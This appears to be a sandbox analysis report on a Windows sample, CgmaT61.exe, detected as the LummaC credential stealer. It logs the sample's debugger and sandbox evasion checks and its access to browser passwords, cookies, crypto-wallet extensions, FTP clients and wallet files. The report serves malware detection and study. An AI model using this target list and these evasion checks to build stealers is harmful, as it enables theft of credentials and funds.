Source: CgmaT61.exe, 00000000.00000003.988518465.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\CgmaT61.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\CgmaT61.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\CgmaT61.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: NTICE
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: SICE
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\CgmaT61.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe

Code function: 0_2_00AA2000 rdtsc

0_2_00AA2000

Source: C:\Users\user\Desktop\CgmaT61.exe

Code function: 0_2_00A89660 LdrInitializeThunk,

0_2_00A89660

Source: CgmaT61.exe, CgmaT61.exe, 00000000.00000002.1157653421.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: bProgram Manager

Source: C:\Users\user\Desktop\CgmaT61.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: CgmaT61.exe, 00000000.00000003.1077713483.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1077530617.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s Defender\MsMpeng.exe
Source: CgmaT61.exe, 00000000.00000003.1077713483.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116595747.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1098606372.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1077530617.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157371253.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158366508.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s%\Windows Defender\MsMpeng.exe
Source: CgmaT61.exe, 00000000.00000003.1081109394.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: CgmaT61.exe, 00000000.00000003.1077713483.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1116595747.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1098606372.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1077530617.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.1157371253.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000002.1158366508.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fender\MsMpeng.exe

Source: C:\Users\user\Desktop\CgmaT61.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: CgmaT61.exe PID: 6932, type: MEMORYSTR
Source: Yara match	File source: 0.2.CgmaT61.exe.a40000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: CgmaT61.exe, 00000000.00000003.1050910887.0000000001696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: CgmaT61.exe, 00000000.00000003.1050910887.0000000001696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: CgmaT61.exe, 00000000.00000003.1051120323.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: z":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":">
Source: CgmaT61.exe, 00000000.00000003.1050910887.0000000001696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: CgmaT61.exe, 00000000.00000003.1051120323.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa,
Source: CgmaT61.exe, 00000000.00000003.1051120323.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}T
Source: CgmaT61.exe, 00000000.00000003.1051120323.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum",
Source: CgmaT61.exe, 00000000.00000003.1050910887.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: CgmaT61.exe, 00000000.00000003.1051120323.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum",

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
